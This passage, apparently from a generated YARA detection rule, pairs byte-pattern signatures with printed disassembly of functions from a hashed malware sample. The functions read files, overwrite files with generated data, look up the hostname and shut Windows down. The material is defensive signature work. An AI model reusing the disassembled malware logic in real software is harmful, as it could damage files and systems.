.text:0x00402a7e 55 push ebp + .text:0x00402a7f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402a81 68b8a84000 push 0x0040a8b8 + .text:0x00402a86 ff15bc904000 call dword [0x004090bc] ;kernel32.GetFileAttributesA(0x0040a8b8) + .text:0x00402a8c 83f8ff cmp eax,0xffffffff + .text:0x00402a8f 7475 jz 0x00402b06 + .text:0x00402a91 57 push edi + .text:0x00402a92 b90c000000 mov ecx,12 + .text:0x00402a97 33c0 xor eax,eax + .text:0x00402a99 8d7c2435 lea edi,dword [esp + 53] + .text:0x00402a9d c644243400 mov byte [esp + 52],0 + .text:0x00402aa2 8d54241c lea edx,dword [esp + 28] + .text:0x00402aa6 f3ab rep: stosd + .text:0x00402aa8 52 push edx + .text:0x00402aa9 68b8a84000 push 0x0040a8b8 + .text:0x00402aae aa stosb + .text:0x00402aaf 885c2424 mov byte [esp + 36],bl + .text:0x00402ab3 885c2425 mov byte [esp + 37],bl + .text:0x00402ab7 885c2426 mov byte [esp + 38],bl + .text:0x00402abb 885c2427 mov byte [esp + 39],bl + .text:0x00402abf 885c2428 mov byte [esp + 40],bl + .text:0x00402ac3 885c2429 mov byte [esp + 41],bl + .text:0x00402ac7 c644242a00 mov byte [esp + 42],0 + .text:0x00402acc e8bffcffff call 0x00402790 ;sub_00402790(0x0040a8b8,local76) + .text:0x00402ad1 83c408 add esp,8 + .text:0x00402ad4 85c0 test eax,eax + .text:0x00402ad6 5f pop edi + .text:0x00402ad7 742d jz 0x00402b06 + .text:0x00402ad9 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00402adf 83c006 add eax,6 + .text:0x00402ae2 50 push eax + .text:0x00402ae3 8d442434 lea eax,dword [esp + 52] + .text:0x00402ae7 50 push eax + .text:0x00402ae8 e8831c0000 call 0x00404770 ;sub_00404770(local52,sub_00402790(0x0040a8b8,local76)) + .text:0x00402aed 8d4c2420 lea ecx,dword [esp + 32] + .text:0x00402af1 8d542430 lea edx,dword [esp + 48] + .text:0x00402af5 51 push ecx + .text:0x00402af6 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00402afc 52 push edx + .text:0x00402afd e8fe1c0000 call 0x00404800 ;sub_00404800(0,local52,local68) + .text:0x00402b02 85c0 test eax,eax + .text:0x00402b04 7418 jz 0x00402b1e + 
.text:0x00402b06 loc_00402b06: [2 XREFS] + .text:0x00402b06 6a01 push 1 + .text:0x00402b08 68b8a84000 push 0x0040a8b8 + .text:0x00402b0d e83efdffff call 0x00402850 ;sub_00402850() + .text:0x00402b12 83c408 add esp,8 + .text:0x00402b15 33c0 xor eax,eax + .text:0x00402b17 5e pop esi + .text:0x00402b18 5d pop ebp + .text:0x00402b19 5b pop ebx + .text:0x00402b1a 83c458 add esp,88 + .text:0x00402b1d c3 ret + .text:0x00402b1e loc_00402b1e: [1 XREFS] + .text:0x00402b1e 6a00 push 0 + .text:0x00402b20 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402b22 6a00 push 0 + .text:0x00402b24 6880000000 push 128 + .text:0x00402b29 6a03 push 3 + .text:0x00402b2b 6a00 push 0 + .text:0x00402b2d 6a00 push 0 + .text:0x00402b2f 6800000080 push 0x80000000 + .text:0x00402b34 68b8a84000 push 0x0040a8b8 + .text:0x00402b39 ff15ac904000 call dword [0x004090ac] ;kernel32.CreateFileA(0x0040a8b8,0x80000000,0,0,3,128,0) + .text:0x00402b3f 83f8ff cmp eax,0xffffffff + .text:0x00402b42 a3aca84000 mov dword [0x0040a8ac],eax + .text:0x00402b47 7509 jnz 0x00402b52 + .text:0x00402b49 5e pop esi + .text:0x00402b4a 5d pop ebp + .text:0x00402b4b 33c0 xor eax,eax + .text:0x00402b4d 5b pop ebx + .text:0x00402b4e 83c458 add esp,88 + .text:0x00402b51 c3 ret + .text:0x00402b52 loc_00402b52: [1 XREFS] + .text:0x00402b52 6a00 push 0 + .text:0x00402b54 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402b56 a1aca84000 mov eax,dword [0x0040a8ac] + .text:0x00402b5b 6a00 push 0 + .text:0x00402b5d 50 push eax + .text:0x00402b5e ff15b0904000 call dword [0x004090b0] ;kernel32.GetFileSize(kernel32.CreateFileA(0x0040a8b8,0x80000000,0,0,3,128,0),0) + .text:0x00402b64 6a04 push 4 + .text:0x00402b66 6800300000 push 0x00003000 + .text:0x00402b6b 50 push eax + .text:0x00402b6c 6a00 push 0 + .text:0x00402b6e a3a4a84000 mov dword [0x0040a8a4],eax + .text:0x00402b73 ff1580904000 call dword [0x00409080] ;kernel32.VirtualAlloc(0,kernel32.GetFileSize(<0x00402b39>,0),0x00003000,4) + .text:0x00402b79 6a00 push 0 + .text:0x00402b7b a3b4a84000 
mov dword [0x0040a8b4],eax + .text:0x00402b80 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402b82 8b0da4a84000 mov ecx,dword [0x0040a8a4] + .text:0x00402b88 8b15b4a84000 mov edx,dword [0x0040a8b4] + .text:0x00402b8e a1aca84000 mov eax,dword [0x0040a8ac] + .text:0x00402b93 6a00 push 0 + .text:0x00402b95 68a8a84000 push 0x0040a8a8 + .text:0x00402b9a 51 push ecx + .text:0x00402b9b 52 push edx + .text:0x00402b9c 50 push eax + .text:0x00402b9d ff15b4904000 call dword [0x004090b4] ;kernel32.ReadFile(<0x00402b39>,kernel32.VirtualAlloc(0,<0x00402b5e>,0x00003000,4),<0x00402b5e>,0x0040a8a8,0) + .text:0x00402ba3 6a00 push 0 + .text:0x00402ba5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402ba7 8b0daca84000 mov ecx,dword [0x0040a8ac] + .text:0x00402bad 51 push ecx + .text:0x00402bae ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x00402b39>) + .text:0x00402bb4 6a00 push 0 + .text:0x00402bb6 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402bb8 8b15b4a84000 mov edx,dword [0x0040a8b4] + .text:0x00402bbe 52 push edx + .text:0x00402bbf e80c120000 call 0x00403dd0 ;sub_00403dd0(<0x00402b73>) + .text:0x00402bc4 83c404 add esp,4 + .text:0x00402bc7 a3b0a84000 mov dword [0x0040a8b0],eax + .text:0x00402bcc 85c0 test eax,eax + .text:0x00402bce 7507 jnz 0x00402bd7 + .text:0x00402bd0 5e pop esi + .text:0x00402bd1 5d pop ebp + .text:0x00402bd2 5b pop ebx + .text:0x00402bd3 83c458 add esp,88 + .text:0x00402bd6 c3 ret + .text:0x00402bd7 loc_00402bd7: [1 XREFS] + .text:0x00402bd7 c705bca940000100 mov dword [0x0040a9bc],1 + .text:0x00402be1 loc_00402be1: [1 XREFS] + .text:0x00402be1 6a00 push 0 + .text:0x00402be3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402be5 8b442470 mov eax,dword [esp + 112] + .text:0x00402be9 8b0db0a84000 mov ecx,dword [0x0040a8b0] + .text:0x00402bef 50 push eax + .text:0x00402bf0 51 push ecx + .text:0x00402bf1 e84a160000 call 0x00404240 ;sub_00404240(0,arg2) + .text:0x00402bf6 83c408 add esp,8 + .text:0x00402bf9 85c0 test eax,eax + .text:0x00402bfb 7431 jz 
0x00402c2e + .text:0x00402bfd 8b542474 mov edx,dword [esp + 116] + .text:0x00402c01 8b4c240c mov ecx,dword [esp + 12] + .text:0x00402c05 52 push edx + .text:0x00402c06 8b542414 mov edx,dword [esp + 20] + .text:0x00402c0a 51 push ecx + .text:0x00402c0b 8b4c241c mov ecx,dword [esp + 28] + .text:0x00402c0f 52 push edx + .text:0x00402c10 8b1528a04000 mov edx,dword [0x0040a028] + .text:0x00402c16 51 push ecx + .text:0x00402c17 8b4c2478 mov ecx,dword [esp + 120] + .text:0x00402c1b 6834ac4000 push 0x0040ac34 + .text:0x00402c20 52 push edx + .text:0x00402c21 68c8a94000 push 0x0040a9c8 + .text:0x00402c26 51 push ecx + .text:0x00402c27 ffd0 call eax ;UnknownApi() + .text:0x00402c29 83c420 add esp,32 + .text:0x00402c2c 8be8 mov ebp,eax + .text:0x00402c2e loc_00402c2e: [1 XREFS] + .text:0x00402c2e 8bc5 mov eax,ebp + .text:0x00402c30 5e pop esi + .text:0x00402c31 5d pop ebp + .text:0x00402c32 5b pop ebx + .text:0x00402c33 83c458 add esp,88 + .text:0x00402c36 c3 ret + */ + $c35 = { 83 EC 58 8B 15 ?? ?? ?? ?? B0 31 88 44 24 ?? 88 44 24 ?? A0 ?? ?? ?? ?? B1 56 88 44 24 ?? 8B 04 95 ?? ?? ?? ?? 53 89 44 24 ?? A1 ?? ?? ?? ?? 55 88 4C 24 ?? 88 4C 24 ?? 8A 0D ?? ?? ?? ?? 33 ED B3 53 56 8B 35 ?? ?? ?? ?? C6 44 24 ?? 49 85 C0 C6 44 24 ?? 44 C6 44 24 ?? 3A C6 44 24 ?? 32 C6 44 24 ?? 30 C6 44 24 ?? 33 C6 44 24 ?? 2D 88 5C 24 ?? C6 44 24 ?? 00 88 4C 24 ?? 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 04 55 FF D6 68 B8 A8 40 00 FF 15 ?? ?? ?? ?? 83 F8 FF 74 ?? 57 B9 0C 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 8D 54 24 ?? F3 AB 52 68 B8 A8 40 00 AA 88 5C 24 ?? 88 5C 24 ?? 88 5C 24 ?? 88 5C 24 ?? 88 5C 24 ?? 88 5C 24 ?? C6 44 24 ?? 00 E8 ?? ?? ?? ?? 83 C4 08 85 C0 5F 74 ?? 8B 0D ?? ?? ?? ?? 83 C0 06 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 8D 4C 24 ?? 8D 54 24 ?? 51 8B 0D ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 85 C0 74 ?? 6A 01 68 B8 A8 40 00 E8 ?? ?? ?? ?? 83 C4 08 33 C0 5E 5D 5B 83 C4 58 C3 6A 00 FF D6 6A 00 68 80 00 00 00 6A 03 6A 00 6A 00 68 00 00 00 80 68 B8 A8 40 00 FF 15 ?? ?? ?? ?? 
83 F8 FF A3 ?? ?? ?? ?? 75 ?? 5E 5D 33 C0 5B 83 C4 58 C3 6A 00 FF D6 A1 ?? ?? ?? ?? 6A 00 50 FF 15 ?? ?? ?? ?? 6A 04 68 00 30 00 00 50 6A 00 A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A 00 A3 ?? ?? ?? ?? FF D6 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 6A 00 68 A8 A8 40 00 51 52 50 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 0D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 85 C0 75 ?? 5E 5D 5B 83 C4 58 C3 C7 05 ?? ?? ?? ?? 01 00 00 00 6A 00 FF D6 8B 44 24 ?? 8B 0D ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? 8B 54 24 ?? 8B 4C 24 ?? 52 8B 54 24 ?? 51 8B 4C 24 ?? 52 8B 15 ?? ?? ?? ?? 51 8B 4C 24 ?? 68 34 AC 40 00 52 68 C8 A9 40 00 51 FF D0 83 C4 20 8B E8 8B C5 5E 5D 5B 83 C4 58 C3 } + /* +function at 0x00405800@9324d1a8ae37a36ae560c37448c9705a with 2 features: + - get file size + - write file on Windows + .text:0x00405800 + .text:0x00405800 FUNC: int cdecl sub_00405800( int arg0, ) [2 XREFS] + .text:0x00405800 + .text:0x00405800 Stack Variables: (offset from initial top of stack) + .text:0x00405800 4: int arg0 + .text:0x00405800 -1023: int local1023 + .text:0x00405800 -1024: int local1024 + .text:0x00405800 -1028: int local1028 + .text:0x00405800 -1032: int local1032 + .text:0x00405800 + .text:0x00405800 66a162a54000 mov ax,word [0x0040a562] + .text:0x00405806 81ec08040000 sub esp,1032 + .text:0x0040580c 6685c0 test ax,ax + .text:0x0040580f 53 push ebx + .text:0x00405810 55 push ebp + .text:0x00405811 56 push esi + .text:0x00405812 0f84fa000000 jz 0x00405912 + .text:0x00405818 8b3578904000 mov esi,dword [0x00409078] + .text:0x0040581e 33ed xor ebp,ebp + .text:0x00405820 668be8 mov bp,ax + .text:0x00405823 6a00 push 0 + .text:0x00405825 c1e50a shl ebp,10 + .text:0x00405828 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040582a 8b842418040000 mov eax,dword [esp + 1048] + .text:0x00405831 6a00 push 0 + .text:0x00405833 6880000000 push 128 + .text:0x00405838 6a04 push 4 + .text:0x0040583a 6a00 push 0 + .text:0x0040583c 
6a02 push 2 + .text:0x0040583e 6800000040 push 0x40000000 + .text:0x00405843 50 push eax + .text:0x00405844 ff15ac904000 call dword [0x004090ac] ;kernel32.CreateFileA(arg0,0x40000000,2,0,4,128,0) + .text:0x0040584a 8bd8 mov ebx,eax + .text:0x0040584c 83fbff cmp ebx,0xffffffff + .text:0x0040584f 895c2410 mov dword [esp + 16],ebx + .text:0x00405853 0f84b9000000 jz 0x00405912 + .text:0x00405859 57 push edi + .text:0x0040585a 6a00 push 0 + .text:0x0040585c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040585e 6a02 push 2 + .text:0x00405860 6a00 push 0 + .text:0x00405862 6a00 push 0 + .text:0x00405864 53 push ebx + .text:0x00405865 ff15a8904000 call dword [0x004090a8] ;kernel32.SetFilePointer(kernel32.CreateFileA(arg0,0x40000000,2,0,4,128,0),0,0,2) + .text:0x0040586b 6a00 push 0 + .text:0x0040586d ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040586f 6a00 push 0 + .text:0x00405871 53 push ebx + .text:0x00405872 ff15b0904000 call dword [0x004090b0] ;kernel32.GetFileSize(<0x00405844>,0) + .text:0x00405878 6a00 push 0 + .text:0x0040587a 8bf8 mov edi,eax + .text:0x0040587c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040587e 8bcd mov ecx,ebp + .text:0x00405880 c1e10a shl ecx,10 + .text:0x00405883 3bcf cmp ecx,edi + .text:0x00405885 767b jbe 0x00405902 + .text:0x00405887 b9ff000000 mov ecx,255 + .text:0x0040588c 33c0 xor eax,eax + .text:0x0040588e 8d7c2419 lea edi,dword [esp + 25] + .text:0x00405892 c644241800 mov byte [esp + 24],0 + .text:0x00405897 f3ab rep: stosd + .text:0x00405899 66ab stosd + .text:0x0040589b aa stosb + .text:0x0040589c 33ff xor edi,edi + .text:0x0040589e c744241000000000 mov dword [esp + 16],0 + .text:0x004058a6 85ed test ebp,ebp + .text:0x004058a8 7658 jbe 0x00405902 + .text:0x004058aa loc_004058aa: [1 XREFS] + .text:0x004058aa f7c7ff030000 test edi,1023 + .text:0x004058b0 752b jnz 0x004058dd + .text:0x004058b2 33db xor ebx,ebx + .text:0x004058b4 loc_004058b4: [1 XREFS] + .text:0x004058b4 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004058ba 
e8d1efffff call 0x00404890 ;sub_00404890() + .text:0x004058bf 02c3 add al,bl + .text:0x004058c1 b9ff000000 mov ecx,255 + .text:0x004058c6 0fbec0 movsx eax,al + .text:0x004058c9 99 cdq + .text:0x004058ca f7f9 idiv ecx + .text:0x004058cc 43 inc ebx + .text:0x004058cd 81fb00040000 cmp ebx,1024 + .text:0x004058d3 88541c17 mov byte [esp + ebx + 23],dl + .text:0x004058d7 7cdb jl 0x004058b4 + .text:0x004058d9 8b5c2414 mov ebx,dword [esp + 20] + .text:0x004058dd loc_004058dd: [1 XREFS] + .text:0x004058dd 6a00 push 0 + .text:0x004058df ffd6 call esi ;kernel32.Sleep(0) + .text:0x004058e1 8d542410 lea edx,dword [esp + 16] + .text:0x004058e5 6a00 push 0 + .text:0x004058e7 52 push edx + .text:0x004058e8 8d442420 lea eax,dword [esp + 32] + .text:0x004058ec 6800040000 push 1024 + .text:0x004058f1 50 push eax + .text:0x004058f2 53 push ebx + .text:0x004058f3 ff15a4904000 call dword [0x004090a4] ;kernel32.WriteFile(<0x00405844>,local1024,1024,local1032,0) + .text:0x004058f9 6a00 push 0 + .text:0x004058fb ffd6 call esi ;kernel32.Sleep(0) + .text:0x004058fd 47 inc edi + .text:0x004058fe 3bfd cmp edi,ebp + .text:0x00405900 72a8 jc 0x004058aa + .text:0x00405902 loc_00405902: [2 XREFS] + .text:0x00405902 6a00 push 0 + .text:0x00405904 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405906 53 push ebx + .text:0x00405907 ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x00405844>) + .text:0x0040590d 6a00 push 0 + .text:0x0040590f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405911 5f pop edi + .text:0x00405912 loc_00405912: [2 XREFS] + .text:0x00405912 5e pop esi + .text:0x00405913 5d pop ebp + .text:0x00405914 5b pop ebx + .text:0x00405915 81c408040000 add esp,1032 + .text:0x0040591b c3 ret + */ + $c36 = { 66 A1 ?? ?? ?? ?? 81 EC 08 04 00 00 66 85 C0 53 55 56 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 33 ED 66 8B E8 6A 00 C1 E5 0A FF D6 8B 84 24 ?? ?? ?? ?? 6A 00 68 80 00 00 00 6A 04 6A 00 6A 02 68 00 00 00 40 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB FF 89 5C 24 ?? 0F 84 ?? ?? ?? ?? 
57 6A 00 FF D6 6A 02 6A 00 6A 00 53 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 53 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 8B CD C1 E1 0A 3B CF 76 ?? B9 FF 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 F3 AB 66 AB AA 33 FF C7 44 24 ?? 00 00 00 00 85 ED 76 ?? F7 C7 FF 03 00 00 75 ?? 33 DB 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 02 C3 B9 FF 00 00 00 0F BE C0 99 F7 F9 43 81 FB 00 04 00 00 88 54 1C ?? 7C ?? 8B 5C 24 ?? 6A 00 FF D6 8D 54 24 ?? 6A 00 52 8D 44 24 ?? 68 00 04 00 00 50 53 FF 15 ?? ?? ?? ?? 6A 00 FF D6 47 3B FD 72 ?? 6A 00 FF D6 53 FF 15 ?? ?? ?? ?? 6A 00 FF D6 5F 5E 5D 5B 81 C4 08 04 00 00 C3 } + /* +function at 0x00402790@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - read file on Windows + .text:0x00402790 + .text:0x00402790 FUNC: int cdecl sub_00402790( int arg0, int arg1, ) [2 XREFS] + .text:0x00402790 + .text:0x00402790 Stack Variables: (offset from initial top of stack) + .text:0x00402790 8: int arg1 + .text:0x00402790 4: int arg0 + .text:0x00402790 -4: int local4 + .text:0x00402790 + .text:0x00402790 51 push ecx + .text:0x00402791 53 push ebx + .text:0x00402792 56 push esi + .text:0x00402793 8b3578904000 mov esi,dword [0x00409078] + .text:0x00402799 57 push edi + .text:0x0040279a 6a00 push 0 + .text:0x0040279c c744241000000000 mov dword [esp + 16],0 + .text:0x004027a4 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004027a6 8b442414 mov eax,dword [esp + 20] + .text:0x004027aa 6a00 push 0 + .text:0x004027ac 6a00 push 0 + .text:0x004027ae 6a03 push 3 + .text:0x004027b0 6a00 push 0 + .text:0x004027b2 6a01 push 1 + .text:0x004027b4 6800000080 push 0x80000000 + .text:0x004027b9 50 push eax + .text:0x004027ba ff15ac904000 call dword [0x004090ac] ;kernel32.CreateFileA(arg0,0x80000000,1,0,3,0,0) + .text:0x004027c0 8bf8 mov edi,eax + .text:0x004027c2 83ffff cmp edi,0xffffffff + .text:0x004027c5 7507 jnz 0x004027ce + .text:0x004027c7 5f pop edi + .text:0x004027c8 5e pop esi + .text:0x004027c9 33c0 xor eax,eax + .text:0x004027cb 5b pop ebx + .text:0x004027cc 59 pop ecx + 
.text:0x004027cd c3 ret + .text:0x004027ce loc_004027ce: [1 XREFS] + .text:0x004027ce 6a00 push 0 + .text:0x004027d0 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004027d2 6a02 push 2 + .text:0x004027d4 6a00 push 0 + .text:0x004027d6 6800fcffff push 0xfffffc00 + .text:0x004027db 57 push edi + .text:0x004027dc ff15a8904000 call dword [0x004090a8] ;kernel32.SetFilePointer(kernel32.CreateFileA(arg0,0x80000000,1,0,3,0,0),0xfffffc00,0,2) + .text:0x004027e2 6800040000 push 1024 + .text:0x004027e7 e810560000 call 0x00407dfc ;msvcrt.??2@YAPAXI@Z(1024) + .text:0x004027ec 83c404 add esp,4 + .text:0x004027ef 8bd8 mov ebx,eax + .text:0x004027f1 6a00 push 0 + .text:0x004027f3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004027f5 8d4c240c lea ecx,dword [esp + 12] + .text:0x004027f9 6a00 push 0 + .text:0x004027fb 51 push ecx + .text:0x004027fc 6800040000 push 1024 + .text:0x00402801 53 push ebx + .text:0x00402802 57 push edi + .text:0x00402803 ff15b4904000 call dword [0x004090b4] ;kernel32.ReadFile(<0x004027ba>,msvcrt.??2@YAPAXI@Z(1024),1024,local4,0) + .text:0x00402809 6a00 push 0 + .text:0x0040280b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040280d 57 push edi + .text:0x0040280e ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x004027ba>) + .text:0x00402814 6a00 push 0 + .text:0x00402816 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402818 8b542418 mov edx,dword [esp + 24] + .text:0x0040281c 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00402822 6a00 push 0 + .text:0x00402824 6800040000 push 1024 + .text:0x00402829 52 push edx + .text:0x0040282a 53 push ebx + .text:0x0040282b e8701f0000 call 0x004047a0 ;sub_004047a0(<0x004027e7>,arg1,1024,0) + .text:0x00402830 83f8ff cmp eax,0xffffffff + .text:0x00402833 7510 jnz 0x00402845 + .text:0x00402835 53 push ebx + .text:0x00402836 e8a5550000 call 0x00407de0 ;msvcrt.??3@YAXPAX@Z(<0x004027e7>) + .text:0x0040283b 83c404 add esp,4 + .text:0x0040283e 33c0 xor eax,eax + .text:0x00402840 5f pop edi + .text:0x00402841 5e pop esi + 
.text:0x00402842 5b pop ebx + .text:0x00402843 59 pop ecx + .text:0x00402844 c3 ret + .text:0x00402845 loc_00402845: [1 XREFS] + .text:0x00402845 5f pop edi + .text:0x00402846 03c3 add eax,ebx + .text:0x00402848 5e pop esi + .text:0x00402849 5b pop ebx + .text:0x0040284a 59 pop ecx + .text:0x0040284b c3 ret + */ + $c37 = { 51 53 56 8B 35 ?? ?? ?? ?? 57 6A 00 C7 44 24 ?? 00 00 00 00 FF D6 8B 44 24 ?? 6A 00 6A 00 6A 03 6A 00 6A 01 68 00 00 00 80 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF FF 75 ?? 5F 5E 33 C0 5B 59 C3 6A 00 FF D6 6A 02 6A 00 68 00 FC FF FF 57 FF 15 ?? ?? ?? ?? 68 00 04 00 00 E8 ?? ?? ?? ?? 83 C4 04 8B D8 6A 00 FF D6 8D 4C 24 ?? 6A 00 51 68 00 04 00 00 53 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 6A 00 68 00 04 00 00 52 53 E8 ?? ?? ?? ?? 83 F8 FF 75 ?? 53 E8 ?? ?? ?? ?? 83 C4 04 33 C0 5F 5E 5B 59 C3 5F 03 C3 5E 5B 59 C3 } + /* +function at 0x00403ba0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - shutdown system + .text:0x00403ba0 + .text:0x00403ba0 FUNC: int thiscall_caller sub_00403ba0( void * ecx, int arg1, ) [2 XREFS] + .text:0x00403ba0 + .text:0x00403ba0 Stack Variables: (offset from initial top of stack) + .text:0x00403ba0 4: int arg1 + .text:0x00403ba0 + .text:0x00403ba0 56 push esi + .text:0x00403ba1 57 push edi + .text:0x00403ba2 8b3d78904000 mov edi,dword [0x00409078] + .text:0x00403ba8 8bf1 mov esi,ecx + .text:0x00403baa 6a00 push 0 + .text:0x00403bac ffd7 call edi ;kernel32.Sleep(0) + .text:0x00403bae 6a01 push 1 + .text:0x00403bb0 683ca04000 push 0x0040a03c + .text:0x00403bb5 8bce mov ecx,esi + .text:0x00403bb7 e824000000 call 0x00403be0 ;sub_00403be0(0x0040a03c,1) + .text:0x00403bbc 8b44240c mov eax,dword [esp + 12] + .text:0x00403bc0 6a00 push 0 + .text:0x00403bc2 50 push eax + .text:0x00403bc3 ff15d4914000 call dword [0x004091d4] ;user32.ExitWindowsEx(arg1,0) + .text:0x00403bc9 6a00 push 0 + .text:0x00403bcb ffd7 call edi ;kernel32.Sleep(0) + .text:0x00403bcd 6a00 push 0 + 
.text:0x00403bcf 683ca04000 push 0x0040a03c + .text:0x00403bd4 8bce mov ecx,esi + .text:0x00403bd6 e805000000 call 0x00403be0 ;sub_00403be0(0x0040a03c,0) + .text:0x00403bdb 5f pop edi + .text:0x00403bdc 5e pop esi + .text:0x00403bdd c20400 ret 4 + */ + $c38 = { 56 57 8B 3D ?? ?? ?? ?? 8B F1 6A 00 FF D7 6A 01 68 3C A0 40 00 8B CE E8 ?? ?? ?? ?? 8B 44 24 ?? 6A 00 50 FF 15 ?? ?? ?? ?? 6A 00 FF D7 6A 00 68 3C A0 40 00 8B CE E8 ?? ?? ?? ?? 5F 5E C2 04 00 } + /* +function at 0x004050f0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - get hostname + .text:0x004050f0 + .text:0x004050f0 FUNC: int cdecl sub_004050f0( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x004050f0 + .text:0x004050f0 Stack Variables: (offset from initial top of stack) + .text:0x004050f0 12: int arg2 + .text:0x004050f0 8: int arg1 + .text:0x004050f0 4: int arg0 + .text:0x004050f0 -4: int local4 + .text:0x004050f0 -5: int local5 + .text:0x004050f0 -6: int local6 + .text:0x004050f0 -7: int local7 + .text:0x004050f0 -8: int local8 + .text:0x004050f0 + .text:0x004050f0 83ec08 sub esp,8 + .text:0x004050f3 53 push ebx + .text:0x004050f4 55 push ebp + .text:0x004050f5 56 push esi + .text:0x004050f6 8b3578904000 mov esi,dword [0x00409078] + .text:0x004050fc 57 push edi + .text:0x004050fd 6a00 push 0 + .text:0x004050ff ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405101 8b5c2424 mov ebx,dword [esp + 36] + .text:0x00405105 8b7c2420 mov edi,dword [esp + 32] + .text:0x00405109 8b4c241c mov ecx,dword [esp + 28] + .text:0x0040510d 53 push ebx + .text:0x0040510e 8d442414 lea eax,dword [esp + 20] + .text:0x00405112 57 push edi + .text:0x00405113 50 push eax + .text:0x00405114 51 push ecx + .text:0x00405115 c644242048 mov byte [esp + 32],72 + .text:0x0040511a c64424216f mov byte [esp + 33],111 + .text:0x0040511f c644242273 mov byte [esp + 34],115 + .text:0x00405124 c644242374 mov byte [esp + 35],116 + .text:0x00405129 c644242400 mov byte [esp + 36],0 + .text:0x0040512e e82dfeffff call 0x00404f60 
;sub_00404f60(arg0,local8,arg1,arg2) + .text:0x00405133 83c410 add esp,16 + .text:0x00405136 6a00 push 0 + .text:0x00405138 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040513a 8b2dc4904000 mov ebp,dword [0x004090c4] + .text:0x00405140 57 push edi + .text:0x00405141 ffd5 call ebp ;kernel32.lstrlenA(arg1) + .text:0x00405143 85c0 test eax,eax + .text:0x00405145 750f jnz 0x00405156 + .text:0x00405147 50 push eax + .text:0x00405148 ffd6 call esi ;kernel32.Sleep(kernel32.lstrlenA(arg1)) + .text:0x0040514a 53 push ebx + .text:0x0040514b 57 push edi + .text:0x0040514c ff1518924000 call dword [0x00409218] ;ws2_32.gethostname(arg1,arg2) + .text:0x00405152 6a00 push 0 + .text:0x00405154 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405156 loc_00405156: [1 XREFS] + .text:0x00405156 6a00 push 0 + .text:0x00405158 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040515a 57 push edi + .text:0x0040515b ffd5 call ebp ;kernel32.lstrlenA(arg1) + .text:0x0040515d 5f pop edi + .text:0x0040515e 5e pop esi + .text:0x0040515f 5d pop ebp + .text:0x00405160 5b pop ebx + .text:0x00405161 83c408 add esp,8 + .text:0x00405164 c3 ret + */ + $c39 = { 83 EC 08 53 55 56 8B 35 ?? ?? ?? ?? 57 6A 00 FF D6 8B 5C 24 ?? 8B 7C 24 ?? 8B 4C 24 ?? 53 8D 44 24 ?? 57 50 51 C6 44 24 ?? 48 C6 44 24 ?? 6F C6 44 24 ?? 73 C6 44 24 ?? 74 C6 44 24 ?? 00 E8 ?? ?? ?? ?? 83 C4 10 6A 00 FF D6 8B 2D ?? ?? ?? ?? 57 FF D5 85 C0 75 ?? 50 FF D6 53 57 FF 15 ?? ?? ?? ?? 
